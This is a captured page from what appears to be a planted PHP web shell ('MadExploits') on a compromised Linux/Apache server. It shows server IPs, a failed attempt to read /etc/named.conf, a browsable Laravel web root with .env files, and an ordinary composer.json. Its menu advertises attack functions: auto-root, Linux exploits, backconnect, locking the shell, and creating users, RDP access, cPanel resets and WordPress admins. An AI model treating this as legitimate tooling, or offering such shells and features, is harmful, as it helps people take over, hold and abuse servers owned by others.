Linux localhost.localdomain 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 10.29.51.72 | : 216.73.216.121
Cant Read [ /etc/named.conf ]
7.2.34
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mpc_emas_01072025_maybecorrupt /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env
1.73
KB
-rw-r--r--
.env.cloud
805
B
-rw-r--r--
.env.example
554
B
-rw-r--r--
.gitattributes
116
B
-rw-r--r--
.gitignore
270
B
-rw-r--r--
artisan
1.66
KB
-rw-r--r--
composer.json
1.99
KB
-rw-r--r--
composer.lock
200.53
KB
-rw-r--r--
index.html
87.93
KB
-rw-r--r--
index.html.1
14.18
KB
-rw-r--r--
package.json
1.06
KB
-rw-r--r--
phpunit.xml
1.05
KB
-rw-r--r--
readme.md
3.39
KB
-rw-r--r--
server.php
584
B
-rw-r--r--
webpack.mix.js
564
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "type": "project", "require": { "php": ">=5.6.4", "artem-schander/l5-modular": "^1.4", "baum/baum": "~1.1", "consoletvs/charts": "5.*", "d11wtq/boris": "^1.0", "doctrine/cache": "^1.7", "dompdf/dompdf": "^0.8.2", "guzzlehttp/guzzle": "^7.2", "intervention/image": "^2.4", "laravel/framework": "5.4.*", "laravel/tinker": "~1.0", "laravelcollective/html": "^5.4.0", "maatwebsite/excel": "~2.1.0", "maddhatter/laravel-fullcalendar": "^1.3", "owen-it/laravel-auditing": "^4.1", "phpmailer/phpmailer": "^6.0", "rap2hpoutre/laravel-log-viewer": "^0.10.4", "spatie/laravel-permission": "^1.16", "webpatser/laravel-uuid": "2.*" }, "require-dev": { "fzaninotto/faker": "~1.4", "mockery/mockery": "0.9.*", "phpunit/phpunit": "~5.7" }, "autoload": { "classmap": [ "database", "app/Library" ], "psr-4": { "App\\": "app/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-root-package-install": [ "php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "php artisan key:generate" ], "post-install-cmd": [ "Illuminate\\Foundation\\ComposerScripts::postInstall", "php artisan optimize" ], "post-update-cmd": [ "Illuminate\\Foundation\\ComposerScripts::postUpdate", "php artisan optimize" ] }, "config": { "preferred-install": "dist", "sort-packages": true, "optimize-autoloader": true } }
Close